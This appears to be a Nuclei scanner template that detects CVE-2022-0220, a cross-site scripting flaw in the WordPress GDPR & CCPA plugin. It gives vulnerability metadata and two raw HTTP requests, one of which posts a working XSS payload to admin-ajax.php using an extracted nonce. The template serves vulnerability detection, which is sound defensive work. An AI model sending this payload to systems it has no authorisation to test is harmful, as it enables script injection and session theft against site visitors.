id: CVE-2022-0220 info: name: WordPress GDPR & CCPA <1.9.27 - Cross-Site Scripting author: daffainfo severity: medium description: | WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users. reference: - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059 - https://nvd.nist.gov/vuln/detail/CVE-2022-0220 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.00124 epss-percentile: 0.46641 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: welaunch product: wordpress_gdpr\&ccpa framework: wordpress tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch http: - raw: - | GET /wp-admin HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}} host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - "contains(header_2, 'text/html')" - "status_code_2 == 200" - "contains(body_2, '') && contains(body_2, '/wp-content/plugins/')" condition: and extractors: - type: regex name: nonce group: 1 regex: - 'nonce":"([0-9a-z]+)' internal: true part: body # digest: 4b0a00483046022100b3722d9e009d5c1c3e2d7b7b51c634728bdcde176567f826c364a6a5a919c92f022100d014f3e7b4ad3ede1574768235689cbe63eb8cfb5429fa3bf3cf27308243695b:922c64590222798bb761d5b6d8e72950